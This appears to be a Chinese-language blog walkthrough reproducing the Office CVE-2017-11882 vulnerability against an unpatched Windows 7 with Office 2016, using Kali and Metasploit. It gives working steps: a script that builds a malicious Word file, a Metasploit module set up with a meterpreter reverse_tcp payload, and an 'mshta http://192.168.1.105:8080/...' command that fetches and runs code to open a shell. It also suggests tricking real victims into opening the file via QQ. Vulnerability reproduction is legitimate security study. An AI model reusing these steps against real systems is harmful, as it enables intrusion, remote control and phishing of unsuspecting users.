前言
这个漏洞其实我不是一两次尝试复现了,但是之前一直没有成功,直到我换了官方原版镜像…所以特地写出来与大家分享,在这里也再次强调一下,漏洞复现一定要用原版镜像,否则不知道会出什么幺蛾子
影响版本
这是网上别人统计的,更详细的需要进一步验证
office 2003
office 2007
office 2010
office 2013
office 2016
环境
目标机
- 64位 win7原版镜像
- 官方原版office2016安装包
攻击机
- kali
- python 2.7
- POC代码
poc代码
具体实现
下载上面链接中的py与rb文件,py是用来生成恶意word文件的,rb文件是可以用于导入到msf中使用的。我们先将这两个文件拷贝到我们的攻击机kali下,然后利用py文件生成恶意的word文件,执行如下语句:
python CVE-2017-11882.py -c "cmd.exe /c calc.exe" -o 11882.doc
上面的语句的功能就是生成一个命名为11882.doc的word文件
打开这个word文件就会执行cmd.exe /c calc.exe这个命令,也就是打开计算器,以此来验证是否确实存在漏洞,接下来我们把这个文件发送到我们的靶机win7上(已经安装了office2016,且没有打补丁)
此时,打开这个doc文件时,会同时打开计算器
这就说明漏洞是的确存在的,这会我们就可以借助metasploit配合刚刚下载的rb文件实现getshell了,一起来试一下吧
- 将网盘中下载的代码”shell.rb”,名称修改为"CVE-2017-11882.rb"
- 将rb文件拷贝到kali下的
/usr/share/metasploit-framework/modules/exploits/windows/smb目录中 - 使用CVE-2017-11882.py模块,生成带有shell的doc文件:
- 终端输入msfconsole启动msf
- 在msf中执行search CVE-2017-11882
可以看到我们的模块已经导入成功了
接下来就使用这个模块来获取meterpreter会话
使用这个模块
use exploit/windows/smb/CVE-2017-11882
设置tcp反弹会话
set payload windows/meterpreter/reverse_tcp
设置攻击者ip地址
set localhost 192.168.1.105
执行
exploit
这是页面会出现如下文字
-使用cve-2017-11882.py脚本生成带有shell的doc文件
python CVE-2017-11882.py -c "mshta http://192.168.1.105:8080/mVgAqD" -o 11882_bak.doc
上面的-c后面的语句就是上图红线框起来的语句。然后我们将生成的doc文件拷贝到靶机上(真实环境下可以通过qq等发送,诱骗点击)
当我打开这个文件的时候,靶机是没有任何异常反应的,但是我们的攻击机kali这边已经拿到shell了
我们随便进入一个session,使用命令sessions session编号,并查看系统信息
我们可以还可以截屏
至此,整个复现流程就结束了,但是还是有几点需要注意
- 镜像的选择:一定要是官方原版
- 靶机与目标机处于同一网段(也就是可以互相通信)